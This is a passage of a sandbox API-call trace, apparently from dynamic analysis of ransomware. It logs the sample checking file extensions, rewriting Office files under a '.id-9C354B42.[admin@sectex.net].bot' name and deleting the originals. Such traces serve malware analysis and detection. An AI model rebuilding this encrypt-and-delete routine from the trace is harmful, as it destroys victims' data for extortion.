	[0157.719] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0157.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.719] lstrlenW (lpString=".doc") returned 4
	[0157.719] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0157.719] lstrlenW (lpString=".docx") returned 5
	[0157.720] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0157.720] lstrlenW (lpString=".pdf") returned 4
	[0157.720] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0157.720] lstrlenW (lpString=".xls") returned 4
	[0157.720] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0157.720] lstrlenW (lpString=".xlsx") returned 5
	[0157.720] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0157.720] lstrlenW (lpString=".ppt") returned 4
	[0157.720] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0157.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.720] lstrlenW (lpString=".zip") returned 4
	[0157.720] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0157.720] lstrlenW (lpString=".rar") returned 4
	[0157.720] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0157.720] lstrlenW (lpString=".bz2") returned 4
	[0157.720] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0157.720] lstrlenW (lpString=".7z") returned 3
	[0157.720] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0157.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.720] lstrlenW (lpString=".dbf") returned 4
	[0157.720] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0157.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.720] lstrlenW (lpString=".1cd") returned 4
	[0157.720] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0157.720] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLAPPTR.FAE") returned 67
	[0157.720] lstrlenW (lpString=".jpg") returned 4
	[0157.720] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0157.720] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0157.721] lstrlenW (lpString="OLJRNLR.FAE") returned 11
	[0157.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.721] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=10160) returned 1
	[0157.721] CloseHandle (hObject=0x3f0) returned 1
	[0157.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae")) returned 0x20
	[0157.721] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.721] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0157.722] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.722] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0157.722] GetLastError () returned 0x0
	[0157.722] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x27b0, lpOverlapped=0x0) returned 1
	[0157.882] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x27c0, lpOverlapped=0x0) returned 1
	[0158.158] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.158] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0158.158] SetEndOfFile (hFile=0x3e8) returned 1
	[0158.158] CloseHandle (hObject=0x3e8) returned 1
	[0158.158] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.158] SetEndOfFile (hFile=0x3f0) returned 1
	[0158.161] CloseHandle (hObject=0x3f0) returned 1
	[0158.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.304] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\oljrnlr.fae")) returned 1
	[0158.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.376] lstrlenW (lpString=".doc") returned 4
	[0158.376] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.376] lstrlenW (lpString=".docx") returned 5
	[0158.376] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.376] lstrlenW (lpString=".pdf") returned 4
	[0158.376] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.376] lstrlenW (lpString=".xls") returned 4
	[0158.376] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.376] lstrlenW (lpString=".xlsx") returned 5
	[0158.376] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.376] lstrlenW (lpString=".ppt") returned 4
	[0158.376] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.376] lstrlenW (lpString=".zip") returned 4
	[0158.376] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.376] lstrlenW (lpString=".rar") returned 4
	[0158.376] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.376] lstrlenW (lpString=".bz2") returned 4
	[0158.376] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.376] lstrlenW (lpString=".7z") returned 3
	[0158.376] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.376] lstrlenW (lpString=".dbf") returned 4
	[0158.376] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.377] lstrlenW (lpString=".1cd") returned 4
	[0158.377] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.377] lstrlenW (lpString=".jpg") returned 4
	[0158.377] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.377] lstrlenW (lpString=".doc") returned 4
	[0158.377] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.377] lstrlenW (lpString=".docx") returned 5
	[0158.377] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.377] lstrlenW (lpString=".pdf") returned 4
	[0158.377] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.377] lstrlenW (lpString=".xls") returned 4
	[0158.377] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.377] lstrlenW (lpString=".xlsx") returned 5
	[0158.377] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.377] lstrlenW (lpString=".ppt") returned 4
	[0158.377] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.377] lstrlenW (lpString=".zip") returned 4
	[0158.377] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.377] lstrlenW (lpString=".rar") returned 4
	[0158.377] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.377] lstrlenW (lpString=".bz2") returned 4
	[0158.377] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.377] lstrlenW (lpString=".7z") returned 3
	[0158.377] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.378] lstrlenW (lpString=".dbf") returned 4
	[0158.378] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.378] lstrlenW (lpString=".1cd") returned 4
	[0158.378] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLJRNLR.FAE") returned 67
	[0158.378] lstrlenW (lpString=".jpg") returned 4
	[0158.378] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.378] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0158.378] lstrlenW (lpString="OLNOTER.FAE") returned 11
	[0158.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0158.379] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=9648) returned 1
	[0158.379] CloseHandle (hObject=0x1b4) returned 1
	[0158.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae")) returned 0x20
	[0158.379] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0158.380] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.380] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0158.380] GetLastError () returned 0x0
	[0158.381] ReadFile (in: hFile=0x1b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x25b0, lpOverlapped=0x0) returned 1
	[0158.529] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x25c0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x25c0, lpOverlapped=0x0) returned 1
	[0158.530] ReadFile (in: hFile=0x1b4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.530] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xea, lpOverlapped=0x0) returned 1
	[0158.530] SetEndOfFile (hFile=0x37c) returned 1
	[0158.530] CloseHandle (hObject=0x37c) returned 1
	[0158.530] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.530] SetEndOfFile (hFile=0x1b4) returned 1
	[0158.532] CloseHandle (hObject=0x1b4) returned 1
	[0158.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.558] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\olnoter.fae")) returned 1
	[0158.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.558] lstrlenW (lpString=".doc") returned 4
	[0158.558] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.559] lstrlenW (lpString=".docx") returned 5
	[0158.559] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.559] lstrlenW (lpString=".pdf") returned 4
	[0158.559] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.559] lstrlenW (lpString=".xls") returned 4
	[0158.559] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.559] lstrlenW (lpString=".xlsx") returned 5
	[0158.559] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.559] lstrlenW (lpString=".ppt") returned 4
	[0158.559] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.559] lstrlenW (lpString=".zip") returned 4
	[0158.559] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.559] lstrlenW (lpString=".rar") returned 4
	[0158.559] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.559] lstrlenW (lpString=".bz2") returned 4
	[0158.559] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.559] lstrlenW (lpString=".7z") returned 3
	[0158.559] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.559] lstrlenW (lpString=".dbf") returned 4
	[0158.559] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.559] lstrlenW (lpString=".1cd") returned 4
	[0158.559] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.559] lstrlenW (lpString=".jpg") returned 4
	[0158.559] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.559] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.560] lstrlenW (lpString=".doc") returned 4
	[0158.560] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0158.560] lstrlenW (lpString=".docx") returned 5
	[0158.560] lstrcmpiW (lpString1=".docx", lpString2="R.FAE") returned -1
	[0158.560] lstrlenW (lpString=".pdf") returned 4
	[0158.560] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0158.560] lstrlenW (lpString=".xls") returned 4
	[0158.560] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0158.560] lstrlenW (lpString=".xlsx") returned 5
	[0158.560] lstrcmpiW (lpString1=".xlsx", lpString2="R.FAE") returned -1
	[0158.560] lstrlenW (lpString=".ppt") returned 4
	[0158.560] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0158.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.560] lstrlenW (lpString=".zip") returned 4
	[0158.560] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0158.560] lstrlenW (lpString=".rar") returned 4
	[0158.560] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0158.560] lstrlenW (lpString=".bz2") returned 4
	[0158.560] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0158.560] lstrlenW (lpString=".7z") returned 3
	[0158.560] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0158.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.560] lstrlenW (lpString=".dbf") returned 4
	[0158.560] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0158.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.560] lstrlenW (lpString=".1cd") returned 4
	[0158.560] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0158.560] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\OLNOTER.FAE") returned 67
	[0158.560] lstrlenW (lpString=".jpg") returned 4
	[0158.560] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0158.561] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0158.561] lstrlenW (lpString="PABR.SAM") returned 8
	[0158.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0158.561] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=11144) returned 1
	[0158.561] CloseHandle (hObject=0x388) returned 1
	[0158.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam")) returned 0x20
	[0158.564] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0158.577] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.577] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0158.577] GetLastError () returned 0x0
	[0158.577] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x2b88, lpOverlapped=0x0) returned 1
	[0158.633] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x2b90, lpOverlapped=0x0) returned 1
	[0158.634] ReadFile (in: hFile=0x3c0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.634] WriteFile (in: hFile=0x3e8, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0158.635] SetEndOfFile (hFile=0x3e8) returned 1
	[0158.635] CloseHandle (hObject=0x3e8) returned 1
	[0158.635] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.635] SetEndOfFile (hFile=0x3c0) returned 1
	[0158.637] CloseHandle (hObject=0x3c0) returned 1
	[0158.637] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0158.637] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\1033\\pabr.sam")) returned 1
	[0158.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.638] lstrlenW (lpString=".doc") returned 4
	[0158.638] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.638] lstrlenW (lpString=".docx") returned 5
	[0158.638] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.638] lstrlenW (lpString=".pdf") returned 4
	[0158.638] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.638] lstrlenW (lpString=".xls") returned 4
	[0158.638] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.638] lstrlenW (lpString=".xlsx") returned 5
	[0158.638] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.638] lstrlenW (lpString=".ppt") returned 4
	[0158.638] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.638] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.639] lstrlenW (lpString=".zip") returned 4
	[0158.639] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.639] lstrlenW (lpString=".rar") returned 4
	[0158.639] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.639] lstrlenW (lpString=".bz2") returned 4
	[0158.639] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.639] lstrlenW (lpString=".7z") returned 3
	[0158.639] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.639] lstrlenW (lpString=".dbf") returned 4
	[0158.639] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.639] lstrlenW (lpString=".1cd") returned 4
	[0158.639] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.639] lstrlenW (lpString=".jpg") returned 4
	[0158.639] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
